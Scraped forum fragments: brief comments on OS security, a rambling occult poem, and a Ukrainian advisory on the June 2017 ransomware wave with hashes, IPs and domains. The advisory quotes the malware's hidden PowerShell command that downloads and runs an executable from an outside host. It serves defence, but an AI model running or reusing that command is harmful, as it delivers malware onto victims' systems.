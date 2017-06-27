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Всего на сайте: 219 писателей
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там в ядре уязвимость была, которую 14 лет не могли пофиксить :D
список вирусов по никсы
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Не буду заперечувати те, що в Вінді багато неприємностей можливо запобігти, якщо працювати з правами користувача з обмеженним доступом. Але ж на практиці всім з незрозумілих причин позаріз потрібні права адміністратора. ))))
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фряху еще всем посоветовал бы
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СЕЙЧАС ОНИ ВСЕ РАЗРУЛЯТ ))))))))
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.....
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Новый мировой порядок
Позади .. А жизнь ключом-вопросом бьет без сожалений.
И Ваш Бог живет в лучезарности луны и ваших устремлений.
Позади .. А длинные ролевые игры и судьбы изнемождений ,
И в логове казуального бытия смелы и в череде слепых рождений
Позади..Выискивая странности у других, но без личных изменений
И Ему жалко жалости мирским страстям и духу воплощений .
Позади.. Весь смысл изменить неизменяемое - людской удел заплесневелый
И неугасимые-лампады-счастья-любящих-создания-монады -- ПОЗАДИ .
А где запятую ставить я - Вам дьявольски отдаМ ....
И дрожь тут не унять и взгляд ангела Земли порочный ,
И чувства наши вплетены в сознание пришельцам ,
И Архитектор-анти-Криатор избы - есть наш БОГ незваный ,
Путь пройден по Днепру .Я кстати там ,
Где раньше инопланетный разум не рад был вам
И в мере возбуждения вашим вещим снам
Я там , на Украине ,на глубине страстей первичных насаждений .
В астрале времени - ментале вожделений.
Все просто - пассажи светлых изменений
Предо мной я..., звуки тайных зарождений
Вижу я не в первый раз наверное .
Сижу я слушаю , курю и вижу ваше соглашение ,
Ведь Темный .. это Он - лихое изменение .
Земной судьбы узоров тайны просвещение ,
Узнал в сем злобном сабже я , где в правде упоение
И Он !! Он Люцифер в эфире рядом - богов молва ..
Он здесь, над головою святая синестезия жива ..
Жужжа судом иных , прощается с ботвой сего мирка.
Мирка - существ с душой шакальей ,уставших от реального добра
. А инопланетные гребут Земельку наперебой толпой ,
Оставив нам ее опустошенной , тонкой , но широкой и нагой .
Сей хитрый образ культа - Он со мной.
В могилу избавленья хитро зазывает-навевает ,
И риффовым потоком соблазнения - наитием толкает и толкает
Толкает Он бежать. Бежать что бы Христа грехи забрать ..
Туда , где обещал Он дать ,
Богов .. отчаянья , отчаянье вселенной децибелы, и сохранить
Сохранить ведь должен нас Он в переходе - не потерять.
Он Be'lakor-создатель радости и синевы печать
И пламень неземной Козел \/ на всех потоках преподносит
И Бог оставит нас и ЗЛОСТНО не осудит.
Но в вере на кого-то , они и вы как все ,ведь жизнь сжигают ,
Так легче и понятней так , эгоистичные дибилы лают..
Он \/ в мире злом воюет кстати - да,да - да, и вы пушисты и белы
А Он-Укроп, он умирающую гордость Вида Сохранит
Он миру дал часть себя, Он Мефистофель Совести Земли !
Но синего мерцания вдохновения иных ,
Нам ближе к духу ,чем шлея души от тел чужих !!!
Как ждал я ключ , для чувств моих-своих
Тут риффы ведь ментальные - друзья судьбы ,
И магии старинные колонны и религии проходы ,
И Енохинианские затворы - темнейших величественные стоны .
Астральных недругов святая дробь под дых,
Все то, что я всегда хотел от них .
У нас судьба едина, одни и те же муки от чужих
И исцеление любви , и мир ментала не утих
И соизмерения святого не для них .
Пока цинизм тут правит , не одинаков наш удел!!!
Ведь Души есть не из сего мирка тут, и это их задел .
И бездуховные тела на Украине в бытии ..И вышли
И вышли из Омеги,да и зайдут после болезни кстати
Болезни Времени - сквозь кровь богов взошли.
И спектры гипотетического рая и Аврамизм нам не у дел!
Мы кровь богов!!! И Днепр люто заревел,
Ведь Украинец , как настоящий инфернал ,
Ни перед кем колени не склонял
А так лишь Темный \/ пос
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СтароСлавянское - большая голова.
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рошен не постраждав!
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Сьогодні в першій половині дня розпочалася масивна хвиля атак із застосуванням нового зразка ransomware.
Попередня інформація:
Механізм розповсюдження - копіює WannaCry, використовує MS17-010 для розповсюдження по мережі
Механізм шифрування - після активації із затримкою призводить до перезавантаження системи, після перезавантаження проходить фейковий chkdsk і жертва бачить повідомлення про викуп. Процес завантаження ОС далі не продовжується. По аналогії із Petya Ransomware шифрує/пошкоджує MBR.
На руках є зразок трояну який розсилався сьогодні зранку але 100% доказів його причетності до шифрування поки не маю.
Маркери компрометації (IOC)
- - - - - - - - - - - - - - - - - - - - - - - -
File Name Order-20062017.doc (насправді RTF із CVE-2017-0199)
MD5 Hash Identifier 415FE69BF32634CA98FA07633F4118E1
SHA-1 Hash Identifier 101CC1CB56C407D5B9149F2C3B8523350D23BA84
SHA-256 Hash Identifier FE2E5D0543B4C8769E401EC216D78A5A3547DFD426FD47E097DF04A5F7D6D206
File Size 6215 bytes
File Type Rich Text Format data
Ініціює зєднання із хостом
84.200.16.242 80
h11p://84.200.16.242/myguy.xls (насправді HTA)
File Name myguy.xls
MD5 Hash Identifier 0487382A4DAF8EB9660F1C67E30F8B25
SHA-1 Hash Identifier 736752744122A0B5EE4B95DDAD634DD225DC0F73
SHA-256 Hash Identifier EE29B9C01318A1E23836B949942DB14D4811246FDAE2F41DF9F0DCD922C63BC6
File Size 13893 bytes
File Type Zip archive data
mshta.exe %WINDIR%\System32\mshta.exe" "C:\myguy.xls.hta" " (PID: 2324)
powershell.exe -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('h11p://french-cooking.com/myguy.exe', '%APPDATA%\10807.exe');" (PID: 2588, Additional Context: ( System.Net.WebClient).DownloadFile('h11p://french-cooking.com/myguy.exe', '%APPDATA%\10807.exe')
10807.exe %APPDATA%\10807.exe" " (PID: 3096)
File Name BCA9D6.exe
MD5 Hash Identifier A1D5895F85751DFE67D19CCCB51B051A
SHA-1 Hash Identifier 9288FB8E96D419586FC8C595DD95353D48E8A060
SHA-256 Hash Identifier 17DACEDB6F0379A65160D73C0AE3AA1F03465AE75CB6AE754C7DCB3017AF1FBD
File Size 275968 bytes
Ініціює зєднання із хостами
111.90.139.247 80
COFFEINOFFICE.XYZ 80
Ще раз звертаю увагу - троян по якому я даю маркери потенційно міг бути використаний для завантаження шифруючої частини.
На тестових системах у мене через 30 хв після активації шифрування не відбулося тому це можуть бути дві різні розсилки.
Як отримаю нову інформацію - повідомлю.
Рекомендації:
- - - - - - - - - - - -
1) Перевірити журнали систем на наявність наданих вище маркерів компрометації
2) По можливості на мережевому обладнанні та груповими політиками заблокувати на системах та серверах порти 135, 445, 1024-1035 TCP
3) Якщо зараження вже сталося в жодному разі не допускати до перезавантаження системи (cmd /k shutdown -a)
4) Системи, які вже зашифровані не форматувати одразу, а зняти образ їх диску
5) Блокувати запуск .exe в %AppData% та %Temp%
Будьте уважні та обережні.
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